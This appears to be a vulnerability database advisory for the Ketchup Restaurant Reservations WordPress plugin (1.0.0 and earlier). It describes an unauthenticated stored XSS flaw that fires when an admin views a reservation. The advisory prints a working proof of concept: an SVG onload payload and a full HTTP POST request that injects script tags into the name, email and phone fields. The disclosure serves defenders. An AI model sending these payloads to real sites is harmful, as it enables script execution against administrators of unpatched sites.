WordPress Plugin Vulnerabilities
Ketchup Restaurant Reservations <= 1.0.0 - Unauthenticated Stored XSS
Description
The plugin does not sanitise and escape some of the reservation user inputs, allowing unauthenticated attackers to perform Cross-Site Scripting attacks logged in admin viewing the malicious reservation made
Proof of Concept
As unauthenticated, make a reservation (ie on a page where the [reservation_form] is embed) and put the following payload in the FullName: a a"><svg/onload=alert(/XSS/)> The Phone Number and Email are also vulnerable (they are only validated client side): POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 428 Connection: close action=kechup_rr_bookings_interact&validation_key=680bed9c59&operation=create&data=%5b%225%22%2c%2211%22%2c%2211%3a11%22%2c%2213%3a11%3a00%22%2c%222022-08-07%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20full%20name%5c%22)%3c%2fscript%3e%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20mail%5c%22)%3c%2fscript%3e%22%2c%222%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20phone%20number%5c%22)%3c%2fscript%3e%22%2c%22pending%22%5d
Affects Plugins
No known fix - plugin closed
References
Classification
Miscellaneous
Original Researcher
Bastijn Ouwendijk
Submitter
Bastijn Ouwendijk
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-09-06 (about 6 months ago)
Added
2022-09-06 (about 6 months ago)
Last Updated
2022-09-06 (about 6 months ago)